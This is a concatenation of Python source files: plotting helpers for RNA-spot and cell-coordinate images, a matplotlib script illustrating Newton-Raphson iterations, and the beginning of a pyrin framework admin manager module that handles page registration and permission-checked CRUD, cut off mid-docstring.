ax[2].hist(data_test["nb_rna"], bins=100, color="steelblue", edgecolor='black', linewidth=1.2) ax[2].set_title("RNA distribution (test)", fontweight="bold", fontsize=15) ax[2].set_ylabel("Frequency") ax[2].set_xlabel("Number of RNA") plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_cell_coordinates(data, id_cell, title=None, framesize=(5, 10), path_output=None, ext="png"): """ Parameters ---------- data : pandas.DataFrame Dataframe with all the data. id_cell : int Index of the cell to plot title : str Title of the plot framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # get the cytoplasm, the nuclei and the rna spots rna_coord, cyt_coord, nuc_coord = stack.get_coordinates(data, id_cell) # plot plt.figure(figsize=framesize) if title is not None: plt.title(title, fontweight="bold", fontsize=25) plt.plot(cyt_coord[:, 1], cyt_coord[:, 0], c="black", linewidth=2) plt.plot(nuc_coord[:, 1], nuc_coord[:, 0], c="steelblue", linewidth=2) plt.scatter(rna_coord[:, 1], rna_coord[:, 0], s=25, c="firebrick", marker=".") plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_layers_coordinates(layers, titles=None, framesize=(5, 10), path_output=None, ext="png"): """Plot input layers of the classification model. Parameters ---------- layers : List[np.ndarray] List of the input images feed into the model. titles : List[str] List of the subtitles. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. Returns ------- """ # plot fig, ax = plt.subplots(1, 3, figsize=framesize) ax[0].imshow(layers[0], cmap="binary", origin='lower') ax[1].imshow(layers[1], cmap="binary", origin='lower') ax[2].imshow(layers[2], cmap="binary", origin='lower') if titles is not None: ax[0].set_title(titles[0], fontweight="bold", fontsize=15) ax[1].set_title(titles[1], fontweight="bold", fontsize=15) ax[2].set_title(titles[2], fontweight="bold", fontsize=15) plt.tight_layout() save_plot(path_output, ext) plt.show() return def plot_extraction_image(results, remove_frame=False, title=None, framesize=None, path_output=None, ext="png", show=True): """Plot or subplot of 2-d coordinates extracted from an image. Parameters ---------- results : List[(cyt_coord, nuc_coord, rna_coord, cell_foci, cell)] - cyt_coord : np.ndarray, np.int64 Coordinates of the cytoplasm border with shape (nb_points, 2). - nuc_coord : np.ndarray, np.int64 Coordinates of the nuclei border with shape (nb_points, 2). - rna_coord : np.ndarray, np.int64 Coordinates of the RNA spots with shape (nb_spots, 3). One coordinate per dimension (yx dimension), plus the index of a potential foci. - cell_foci : np.ndarray, np.int64 Array with shape (nb_foci, 7). One coordinate per dimension for the foci centroid (zyx coordinates), the number of RNAs detected in the foci, its index, the area of the foci region and its maximum intensity value. - cell : Tuple[int] Box coordinate of the cell in the original image (min_y, min_x, max_y and max_x). remove_frame : bool Remove axes and frame. title : str Title of the image. framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. show : bool Show the figure or not. Returns ------- """ # check parameters stack.check_parameter(results=list, remove_frame=bool, title=(str, type(None)), framesize=(tuple, type(None)), path_output=(str, type(None)), ext=(str, list)) # we plot 3 images by row maximum nrow = int(np.ceil(len(results)/3)) ncol = min(len(results), 3) if framesize is None: framesize = (5 * ncol, 5 * nrow) # plot one image marge = stack.get_offset_value() if len(results) == 1: cyt, nuc, rna, foci, _ = results[0] if remove_frame: fig = plt.figure(figsize=(8, 8), frameon=False) ax = fig.add_axes([0, 0, 1, 1]) ax.axis('off') else: plt.figure(figsize=(8, 8)) plt.xlim(-marge, max(cyt[:, 1]) + marge) plt.ylim(max(cyt[:, 0]) + marge, -marge) plt.scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") plt.scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") plt.scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: plt.scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None and not remove_frame: title_plot = title + "_cell_0" plt.title(title_plot, fontweight="bold", fontsize=25) if not remove_frame: plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return # plot multiple images fig, ax = plt.subplots(nrow, ncol, figsize=framesize) # one row if len(results) in [2, 3]: for i, (cyt, nuc, rna, foci, _) in enumerate(results): if remove_frame: ax[i].axis("off") ax[i].set_xlim(-marge, max(cyt[:, 1]) + marge) ax[i].set_ylim(max(cyt[:, 0]) + marge, -marge) ax[i].scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") ax[i].scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") ax[i].scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: ax[i].scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None: title_plot = title + "_cell_{0}".format(i) ax[i].set_title(title_plot, fontweight="bold", fontsize=10) # several rows else: # we complete the row with empty frames r = nrow * 3 - len(results) results_completed = [(cyt, nuc, rna, foci, _) for (cyt, nuc, rna, foci, _) in results] results_completed += [None] * r for i, result in enumerate(results_completed): row = i // 3 col = i % 3 if result is None: ax[row, col].set_visible(False) continue else: cyt, nuc, rna, foci, cell = result if remove_frame: ax[row, col].axis("off") ax[row, col].set_xlim(-marge, max(cyt[:, 1]) + marge) ax[row, col].set_ylim(max(cyt[:, 0]) + marge, -marge) ax[row, col].scatter(cyt[:, 1], cyt[:, 0], c="black", s=5, marker=".") ax[row, col].scatter(nuc[:, 1], nuc[:, 0], c="steelblue", s=5, marker=".") ax[row, col].scatter(rna[:, 1], rna[:, 0], c="firebrick", s=50, marker="x") if len(foci) > 0: ax[row, col].scatter(foci[:, 2], foci[:, 1], c="chartreuse", s=60, marker="D") if title is not None: title_plot = title + "_cell_{0}".format(i) ax[row, col].set_title(title_plot, fontweight="bold", fontsize=10) plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return def plot_cell(cyt_coord, nuc_coord=None, rna_coord=None, foci_coord=None, image_cyt=None, mask_cyt=None, mask_nuc=None, count_rna=False, title=None, remove_frame=False, rescale=False, framesize=(15, 10), path_output=None, ext="png", show=True): """ Plot image and coordinates extracted for a specific cell. Parameters ---------- cyt_coord : np.ndarray, np.int64 Coordinates of the cytoplasm border with shape (nb_points, 2). nuc_coord : np.ndarray, np.int64 Coordinates of the nuclei border with shape (nb_points, 2). rna_coord : np.ndarray, np.int64 Coordinates of the RNA spots with shape (nb_spots, 4). One coordinate per dimension (zyx dimension), plus the index of a potential foci. foci_coord : np.ndarray, np.int64 Array with shape (nb_foci, 5). One coordinate per dimension for the foci centroid (zyx coordinates), the number of RNAs detected in the foci and its index. image_cyt : np.ndarray, np.uint Original image of the cytoplasm. mask_cyt : np.ndarray, np.uint Mask of the cytoplasm. mask_nuc : np.ndarray, np.uint Mask of the nucleus. count_rna : bool Display the number of RNAs in a foci. title : str Title of the image. remove_frame : bool Remove axes and frame. rescale : bool Rescale pixel values of the image (made by default in matplotlib). framesize : tuple Size of the frame used to plot with 'plt.figure(figsize=framesize)'. path_output : str Path to save the image (without extension). ext : str or List[str] Extension used to save the plot. If it is a list of strings, the plot will be saved several times. show : bool Show the figure or not. Returns ------- """ # TODO recode it # check parameters stack.check_array(cyt_coord, ndim=2, dtype=[np.int64]) if nuc_coord is not None: stack.check_array(nuc_coord, ndim=2, dtype=[np.int64]) if rna_coord is not None: stack.check_array(rna_coord, ndim=2, dtype=[np.int64]) if foci_coord is not None: stack.check_array(foci_coord, ndim=2, dtype=[np.int64]) if image_cyt is not None: stack.check_array(image_cyt, ndim=2, dtype=[np.uint8, np.uint16, np.int64]) if mask_cyt is not None: stack.check_array(mask_cyt, ndim=2, dtype=[np.uint8, np.uint16, np.int64, bool]) if mask_nuc is not None: stack.check_array(mask_nuc, ndim=2, dtype=[np.uint8, np.uint16, np.int64, bool]) stack.check_parameter(count_rna=bool, title=(str, type(None)), remove_frame=bool, rescale=bool, framesize=tuple, path_output=(str, type(None)), ext=(str, list)) if title is None: title = "" else: title = " ({0})".format(title) # get shape of image built from coordinates marge = stack.get_offset_value() max_y = cyt_coord[:, 0].max() + 2 * marge + 1 max_x = cyt_coord[:, 1].max() + 2 * marge + 1 image_shape = (max_y, max_x) # get cytoplasm layer cyt = np.zeros(image_shape, dtype=bool) cyt[cyt_coord[:, 0] + marge, cyt_coord[:, 1] + marge] = True # get nucleus layer nuc = np.zeros(image_shape, dtype=bool) if nuc_coord is not None: nuc[nuc_coord[:, 0] + marge, nuc_coord[:, 1] + marge] = True # get rna layer rna = np.zeros(image_shape, dtype=bool) if rna_coord is not None: rna[rna_coord[:, 1] + marge, rna_coord[:, 2] + marge] = True rna = stack.dilation_filter(rna, kernel_shape="square", kernel_size=3) # get foci layer foci = np.zeros(image_shape, dtype=bool) if foci_coord is not None: rna_in_foci_coord = rna_coord[rna_coord[:, 3] != -1, :].copy() foci[rna_in_foci_coord[:, 1] + marge, rna_in_foci_coord[:, 2] + marge] = True foci = stack.dilation_filter(foci, kernel_shape="square", kernel_size=3) # build image coordinate image_coord = np.ones((max_y, max_x, 3), dtype=np.float32) image_coord[cyt, :] = [0, 0, 0] # black image_coord[nuc, :] = [0, 102 / 255, 204 / 255] # blue image_coord[rna, :] = [204 / 255, 0, 0] # red image_coord[foci, :] = [102 / 255, 204 / 255, 0] # green # plot original and coordinate image if image_cyt is not None: fig, ax = plt.subplots(1, 2, sharex='col', figsize=framesize) # original image if remove_frame: ax[0].axis("off") if not rescale: vmin, vmax = get_minmax_values(image_cyt) ax[0].imshow(image_cyt, vmin=vmin, vmax=vmax) else: ax[0].imshow(image_cyt) if mask_cyt is not None: boundaries_cyt = find_boundaries(mask_cyt, mode='inner') boundaries_cyt = np.ma.masked_where(boundaries_cyt == 0, boundaries_cyt) ax[0].imshow(boundaries_cyt, cmap=ListedColormap(['red'])) if mask_nuc is not None: boundaries_nuc = find_boundaries(mask_nuc, mode='inner') boundaries_nuc = np.ma.masked_where(boundaries_nuc == 0, boundaries_nuc) ax[0].imshow(boundaries_nuc, cmap=ListedColormap(['blue'])) ax[0].set_title("Original image" + title, fontweight="bold", fontsize=10) # coordinate image if remove_frame: ax[1].axis("off") ax[1].imshow(image_coord) if count_rna and foci_coord is not None: for (_, y, x, nb_rna, _) in foci_coord: ax[1].text(x+5, y-5, str(nb_rna), color="#66CC00", size=20) ax[1].set_title("Coordinate image" + title, fontweight="bold", fontsize=10) plt.tight_layout() # plot coordinate image only else: if remove_frame: fig = plt.figure(figsize=framesize, frameon=False) ax = fig.add_axes([0, 0, 1, 1]) ax.axis('off') else: plt.figure(figsize=framesize) plt.title("Coordinate image" + title, fontweight="bold", fontsize=25) plt.imshow(image_coord) if count_rna and foci_coord is not None: for (_, y, x, nb_rna, _) in foci_coord: plt.text(x+5, y-5, str(nb_rna), color="#66CC00", size=20) if not remove_frame: plt.tight_layout() if path_output is not None: save_plot(path_output, ext) if show: plt.show() else: plt.close() return import matplotlib.pyplot as plt import numpy as np from matplotlib import rc __author__ = 'ernesto' # if use latex or mathtext rc('text', usetex=True) rc('mathtext', fontset='cm') def fun_g(x): return np.exp(-np.square(x) / 2) + 0.1 * np.exp(-np.square(x-10) / 2) def fun_g_derivative(x): return -x * np.exp(-np.square(x) / 2) - 0.1 * (x - 10) * np.exp(-np.square(x - 10) / 2) def fun_g_second_derivative(x): return (np.square(x) - 1) * np.exp(-np.square(x) / 2) \ + 0.1 * (np.square(x - 10) - 1) * np.exp(-np.square(x - 10) / 2) def newton_raphson(x0, nsteps): x_vals = np.zeros((nsteps+1,)) i = 0 x_vals[i] = x0 for i in np.arange(1, nsteps+1): x_vals[i] = x_vals[i-1] - fun_g_derivative(x_vals[i-1]) / fun_g_second_derivative(x_vals[i-1]) return x_vals # abscissa values xmin = -3 xmax = 13 x = np.linspace(xmin, xmax, 300) # normal distribution and density values in x g = fun_g(x) g_derivative = fun_g_derivative(x) nsteps = 20 x01 = 0.7 xn1 = newton_raphson(x01, nsteps) x02 = 1.5 xn2 = newton_raphson(x02, nsteps) x03 = 9.5 xn3 = newton_raphson(x03, nsteps) print(xn2) # axis parameters dx = 0.5 xmin_ax = xmin - dx xmax_ax = xmax + dx # para la grafica de g(x) ymax_ax1 = 1.2 ymin_ax1 = -0.2 # para la grafica de g'(x) ymax_ax2 = 0.7 ymin_ax2 = -0.7 # x ticks labels margin xtm = -0.13 ytm = 0.3 # font size fontsize = 14 # colors from coolwarm col1 = 'r' col2 = 'deepskyblue' col3 = 'green' fig = plt.figure(0, figsize=(9, 6), frameon=False) # grafica de g(x) ax = plt.subplot2grid((2, 1), (0, 0), rowspan=1, colspan=1) plt.xlim(xmin_ax, xmax_ax) plt.ylim(ymin_ax1, ymax_ax1) # axis arrows plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.annotate("", xytext=(0, ymin_ax1), xycoords='data', xy=(0, ymax_ax1), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.plot(x, g, 'k', linewidth=2) plt.plot(xn1, fun_g(xn1), '.', color=col1, markersize=9, label='$x_0={:.1f}$'.format(x01)) plt.plot(xn2, fun_g(xn2), '.', color=col2, markersize=9, label='$x_0={:.1f}$'.format(x02)) plt.plot(xn3, fun_g(xn3), '.', color=col3, markersize=9, label='$x_0={:.1f}$'.format(x03)) plt.plot(np.array([xn1[0:4], xn1[0:4]]), np.array([np.zeros((4,)), fun_g(xn1[0:4])]), '--', color=col1, lw=1) xm = -0.18 plt.annotate(r'$x_0$', xytext=(xn1[0]+0.5, xm), xycoords='data', xy=(xn1[0], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.2, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_2$', xytext=(xn1[2]-0.4, xm), xycoords='data', xy=(xn1[2], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="left", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.5, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_1$', xytext=(xn1[1]-0.3, xm), xycoords='data', xy=(xn1[1], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.8, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.annotate(r'$x_3$', xytext=(xn1[3]-0.1, xm), xycoords='data', xy=(xn1[3], 0), textcoords='data', color=col1, fontsize=fontsize, va="baseline", ha="right", arrowprops=dict(arrowstyle="-|>, head_width=0.15, head_length=0.3", color=col1, relpos=(0.6, 1), patchA=None, patchB=None, shrinkA=1, shrinkB=1)) plt.plot([xn2[0], xn2[0]], [0, fun_g(xn2[0])], '--', color=col2, lw=1) plt.text(xn2[0]+0.1, xtm, '$x_0$', color=col2, fontsize=fontsize, ha='center', va='baseline') plt.plot([xn3[0], xn3[0]], [0, fun_g(xn3[0])], '--', color=col3, lw=1) plt.text(xn3[0], xtm, '$x_0$', color=col3, fontsize=fontsize, ha='center', va='baseline') plt.text(ytm, ymax_ax1, '$g(x)$', fontsize=fontsize, ha='left', va='center') plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='center', va='baseline') ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.tick_params(labelsize=10) ax.legend(fontsize=fontsize, framealpha=0) # grafica de g'(x) ax = plt.subplot2grid((2, 1), (1, 0), rowspan=1, colspan=1) plt.xlim(xmin_ax, xmax_ax) plt.ylim(ymin_ax2, ymax_ax2) # axis arrows plt.annotate("", xytext=(xmin_ax, 0), xycoords='data', xy=(xmax_ax, 0), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.annotate("", xytext=(0, ymin_ax2), xycoords='data', xy=(0, ymax_ax2), textcoords='data', arrowprops=dict(width=0.1, headwidth=6, headlength=8, facecolor='black', shrink=0.002)) plt.plot(x, g_derivative, 'k', linewidth=2) plt.plot(xn1, fun_g_derivative(xn1), '.', color=col1, markersize=9) plt.plot(xn2, fun_g_derivative(xn2), '.', color=col2, markersize=9) plt.plot(xn3, fun_g_derivative(xn3), '.', color=col3, markersize=9) plt.plot(xn1[0:2], [fun_g_derivative(xn1[0]), 0], color=col1, lw=1) plt.plot(xn1[1:3], [fun_g_derivative(xn1[1]), 0], color=col1, lw=1) plt.plot(xn1[2:4], [fun_g_derivative(xn1[2]), 0], color=col1, lw=1) plt.plot(np.array([xn1[0:4], xn1[0:4]]), np.array([np.zeros((4,)), fun_g_derivative(xn1[0:4])]), '--', color=col1, lw=1) plt.text(xn1[0]+0.1, -xtm, '$x_0$', color=col1, fontsize=fontsize, ha='center', va='top') plt.plot([xn2[0], xn2[0]], [0, fun_g_derivative(xn2[0])], '--', color=col2, lw=1) plt.text(xn2[0], -xtm, '$x_0$', color=col2, fontsize=fontsize, ha='center', va='top') plt.plot([xn3[0], xn3[0]], [0, fun_g_derivative(xn3[0])], '--', color=col3, lw=1) plt.text(xn3[0], xtm, '$x_0$', color=col3, fontsize=fontsize, ha='center', va='baseline') plt.text(ytm, ymax_ax2, '$g\'(x)$', fontsize=fontsize, ha='left', va='center') plt.text(xmax_ax, xtm, '$x$', fontsize=fontsize, ha='center', va='baseline') ax.spines['right'].set_visible(False) ax.spines['top'].set_visible(False) ax.tick_params(labelsize=10) # save as pdf image plt.savefig('problem_7_18.pdf', bbox_inches='tight') plt.show() src/pyrin/admin/manager.py # -*- coding: utf-8 -*- """ admin manager module. """ from copy import deepcopy import pyrin.utils.dictionary as dict_utils import pyrin.configuration.services as config_services import pyrin.database.paging.services as paging_services import pyrin.database.services as database_services import pyrin.globalization.datetime.services as datetime_services import pyrin.globalization.locale.services as locale_services import pyrin.security.authentication.services as authentication_services from pyrin.core.globals import _ from pyrin.admin import AdminPackage from pyrin.core.structs import Context, Manager from pyrin.admin.interface import AbstractAdminPage from pyrin.security.enumerations import InternalAuthenticatorEnum from pyrin.admin.enumerations import ListFieldTypeEnum, FormFieldTypeEnum from pyrin.admin.exceptions import InvalidAdminPageTypeError, DuplicatedAdminPageError, \ AdminPageNotFoundError, AdminOperationNotAllowedError, AdminPagesHaveNotLoadedError class AdminManager(Manager): """ admin manager class. """ package_class = AdminPackage def __init__(self, **options): """ initializes an instance of AdminManager. """ super().__init__() # a dict containing all registered admin pages in the form of: # {str register_name: AbstractAdminPage instance} self._admin_pages = Context() # a dict containing all registered admin pages for different entity types. # in the form of: # {BaseEntity entity: AbstractAdminPage instance} self._admin_entities = Context() # a tuple of all available admin pages metadata sorted by category and name. # in the form of: # ({str category: [dict admin_metadata]}) self._admin_metadata = None # a dict containing a map between all form field types and list field types. # for example: {str form_field_type: str list_field_type} self._type_map = self._get_form_to_list_type_map() self._base_url = self._load_base_url() # shared admin panel configs required for client. self._configs = None def _get_form_to_list_type_map(self): """ gets the type map for different form fields to list fields. **NOTE:** as the client side table does not format the numeric values correctly, we have to introduce numeric values as string to the client to keep the behavior of these column types as others. :rtype: dict """ result = Context() result[FormFieldTypeEnum.BOOLEAN] = ListFieldTypeEnum.BOOLEAN result[FormFieldTypeEnum.DATE] = ListFieldTypeEnum.DATE result[FormFieldTypeEnum.DATETIME] = ListFieldTypeEnum.DATETIME result[FormFieldTypeEnum.TIME] = ListFieldTypeEnum.TIME result[FormFieldTypeEnum.EMAIL] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.FILE] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.NUMBER] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.INTEGER] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.FLOAT] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.PASSWORD] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.TELEPHONE] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.STRING] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.TEXT] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.URL] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.UUID] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.IPV4] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.IPV6] = ListFieldTypeEnum.STRING result[FormFieldTypeEnum.OBJECT] = ListFieldTypeEnum.OBJECT return result def _load_base_url(self): """ loads admin base url from `admin` config store. :rtype: str """ url = config_services.get_active('admin', 'url') if not url.endswith('/'): url = f'{url}/' return url def _remove_from_pages(self, register_name): """ removes the admin page with given register name from admin pages. it returns the removed admin page. :param str register_name: register name of the admin page to be removed. :rtype: pyrin.admin.interface.AbstractAdminPage """ instance = self._admin_pages.pop(register_name, None) if instance is not None: return self._remove_from_entities(instance.get_entity()) return instance def _remove_from_entities(self, entity): """ removes the admin page with given entity from admin entities. it returns the removed admin page. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to be removed. :rtype: pyrin.admin.interface.AbstractAdminPage """ instance = self._admin_entities.pop(entity, None) if instance is not None: return self._remove_from_pages(instance.get_register_name()) return None def _get_admin_page(self, register_name): """ gets the admin page with given register name. :param str register_name: register name of admin page to be get. this name is case-insensitive. :raises AdminPageNotFoundError: admin page not found error. :rtype: pyrin.admin.interface.AbstractAdminPage """ name = str(register_name).lower() if name not in self._admin_pages: raise AdminPageNotFoundError(_('Admin page [{name}] not found.') .format(name=name)) return self._admin_pages.get(name) def try_get_admin_page(self, entity): """ gets the admin page for given entity class. it returns None if admin page does not exist. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to be get. :rtype: pyrin.admin.interface.AbstractAdminPage """ return self._admin_entities.get(entity) def is_admin_enabled(self): """ gets a value indicating that admin api is enabled. :rtype: bool """ return config_services.get_active('admin', 'enabled') def has_admin(self, entity): """ gets a value indicating that given entity class has admin page. :param type[pyrin.database.model.base.BaseEntity] entity: entity class. :rtype: bool """ return entity in self._admin_entities def get_admin_base_url(self): """ gets admin base url. :rtype: str """ return self._base_url def get_admin_configurations(self): """ gets the admin api configurations. :returns: dict(bool enabled: enable admin api, bool authenticated: admin api access type, str url: admin api base url) :rtype: dict """ return config_services.get_active_section('admin') def get_default_category(self): """ gets the default category to be used for admin pages without category. :rtype: str """ category = config_services.get_active('admin', 'default_category') return category.upper() def register(self, instance, **options): """ registers the provided instance into available admin pages. :param pyrin.admin.interface.AbstractAdminPage instance: admin page instance. :keyword bool replace: specifies that if another admin page with the same name or the same entity exists, replace it. defaults to False if not provided and raises an error. :raises InvalidAdminPageTypeError: invalid admin page type error. :raises DuplicatedAdminPageError: duplicated admin page error. """ if not isinstance(instance, AbstractAdminPage): raise InvalidAdminPageTypeError('Input parameter [{admin}] is ' 'not an instance of [{base}].' .format(admin=instance, base=AbstractAdminPage)) replace = options.get('replace', False) if instance.get_register_name() in self._admin_pages: if replace is not True: raise DuplicatedAdminPageError('There is another registered admin page ' 'with register name [{name}] but "replace" ' 'option is not set, so admin page [{instance}] ' 'could not be registered.' .format(name=instance.get_register_name(), instance=instance)) self._remove_from_pages(instance.get_register_name()) if instance.get_entity() in self._admin_entities: if replace is not True: raise DuplicatedAdminPageError('There is another registered admin page ' 'for entity [{entity}] but "replace" ' 'option is not set, so admin page [{instance}] ' 'could not be registered.' .format(entity=instance.get_entity(), instance=instance)) self._remove_from_entities(instance.get_entity()) self._admin_pages[instance.get_register_name()] = instance self._admin_entities[instance.get_entity()] = instance def get(self, register_name, pk): """ gets an entity with given primary key. :param str register_name: register name of admin page. :param object pk: primary key of entity to be get. :raises AdminOperationNotAllowedError: admin operation not allowed error. :raises EntityNotFoundError: entity not found error. :rtype: pyrin.database.model.base.BaseEntity """ admin = self._get_admin_page(register_name) if not admin.has_get_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow get operation.') .format(name=admin.get_register_name())) return admin.get(pk) def find(self, register_name, **filters): """ performs find on given admin page and returns the result. :param str register_name: register name of admin page. :keyword **filters: all filters to be passed to related admin page. :rtype: list[ROW_RESULT] """ admin = self._get_admin_page(register_name) return admin.find(**filters) def create(self, register_name, **data): """ performs create on given admin page. :param str register_name: register name of admin page. :keyword **data: all data to be passed to related admin page for data creation. :raises AdminOperationNotAllowedError: admin operation not allowed error. :rtype: object """ admin = self._get_admin_page(register_name) if not admin.has_create_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow create operation.') .format(name=admin.get_register_name())) return admin.create(**data) def update(self, register_name, pk, **data): """ performs update on given admin page. :param str register_name: register name of admin page. :param object pk: entity primary key to be updated. :keyword **data: all data to be passed to related admin page for data creation. :raises AdminOperationNotAllowedError: admin operation not allowed error. :raises EntityNotFoundError: entity not found error. """ admin = self._get_admin_page(register_name) if not admin.has_update_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow update operation.') .format(name=admin.get_register_name())) return admin.update(pk, **data) def remove(self, register_name, pk): """ performs remove on given admin page. :param str register_name: register name of admin page. :param object pk: entity primary key to be removed. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove operation.') .format(name=admin.get_register_name())) return admin.remove(pk) def remove_bulk(self, register_name, pk): """ performs remove bulk on given admin page. :param str register_name: register name of admin page. :param object | list[object] pk: entity primary keys to be removed. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove operation.') .format(name=admin.get_register_name())) return admin.remove_bulk(pk) def remove_all(self, register_name): """ performs remove all on given admin page. :param str register_name: register name of admin page. :raises AdminOperationNotAllowedError: admin operation not allowed error. """ admin = self._get_admin_page(register_name) if not admin.has_remove_all_permission(): raise AdminOperationNotAllowedError(_('Admin page [{name}] does ' 'not allow remove all operation.') .format(name=admin.get_register_name())) return admin.remove_all() def populate_main_metadata(self): """ populates all admin pages main metadata. """ metadata = dict() for name, admin in self._admin_pages.items(): pages = metadata.setdefault(admin.get_category(), []) pages.append(admin.get_main_metadata()) result = list() sorted_categories = sorted(metadata.keys()) for category in sorted_categories: pages = metadata.get(category) sorted_pages = dict_utils.extended_sort(pages, 'plural_name') single_category = dict() single_category[category] = sorted_pages result.append(single_category) self._admin_metadata = tuple(result) def get_main_metadata(self): """ gets all admin pages main metadata. :raises AdminPagesHaveNotLoadedError: admin pages have not loaded error. :returns: dict(list pages, dict configs) :rtype: dict """ if self._admin_metadata is None: raise AdminPagesHaveNotLoadedError('Admin pages have not loaded yet.') result = dict(pages=list(self._admin_metadata), configs=self.get_configs()) return result def get_find_metadata(self, register_name): """ gets the find metadata for given admin page. :param str register_name: register name of admin page. :rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_find_metadata() def get_create_metadata(self, register_name): """ gets the create metadata for given admin page. :param str register_name: register name of admin page. :rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_create_metadata() def get_update_metadata(self, register_name): """ gets the update metadata for given admin page. :param str register_name: register name of admin page. :rtype: dict """ admin = self._get_admin_page(register_name) return admin.get_update_metadata() def register_name_for(self, entity): """ gets the admin page register name for given entity class. it raises an error if the given entity does not have an admin page. :param type[pyrin.database.model.base.BaseEntity] entity: the entity class of admin page to get its register name. :raises AdminPageNotFoundError: admin page not found error. :rtype: str """ admin = self.try_get_admin_page(entity) if admin is None: raise AdminPageNotFoundError(_('Entity [{entity}] does not have an admin page.') .format(entity=entity)) return admin.get_register_name() def url_for(self, register_name): """ gets the base url for given admin page. :param str register_name: admin page register name. :rtype: str """ return f'{self.get_admin_base_url()}{register_name.lower()}/' def get_list_field_type(self, form_field_type): """ gets the equivalent list field type for given form field type. it may return None. :param str form_field_type: form field type to get its list field type. :enum form_field_type: BOOLEAN = 'boolean' DATE = 'date' DATETIME = 'datetime' TIME = 'time' EMAIL = 'email' FILE = 'file' NUMBER = 'number' PASSWORD = 'password' TELEPHONE = 'telephone' STRING = 'string' TEXT = 'text' URL = 'url' UUID = 'uuid' IPV4 = 'ipv4' IPV6 = 'ipv6' OBJECT = 'object' :rtype: str """ return self._type_map.get(form_field_type) def populate_caches(self): """ populates required caches of all registered admin pages. :returns: count of registered admin pages :rtype: int """ for admin in self._admin_pages.values(): admin.populate_caches() return len(self._admin_pages) def get_configs(self): """ gets the required configs of admin api. :returns: dict(str panel_name, str page_key, str page_size_key, str ordering_key, str locale_key, str timezone_key, str search_param, str hidden_pk_name) :rtype: dict """ if self._configs is not None: return deepcopy(self._configs) panel_name = config_services.get_active('admin', 'panel_name') search_param = config_services.get_active('admin', 'search_param') hidden_pk_name = config_services.get_active('admin', 'hidden_pk_name') page_key, page_size_key = paging_services.get_paging_param_names() ordering_key = database_services.get_ordering_key() locale_key = locale_services.get_locale_key() timezone_key = datetime_services.get_timezone_key() result = dict(panel_name=panel_name, page_key=page_key, page_size_key=page_size_key, ordering_key=ordering_key, locale_key=locale_key, timezone_key=timezone_key, search_param=search_param, hidden_pk_name=hidden_pk_name) self._configs = deepcopy(result) return result def login(self, username, password, **options): """ logs in an internal user with given info into admin panel. :param str username: username. :param str password: password. :raises 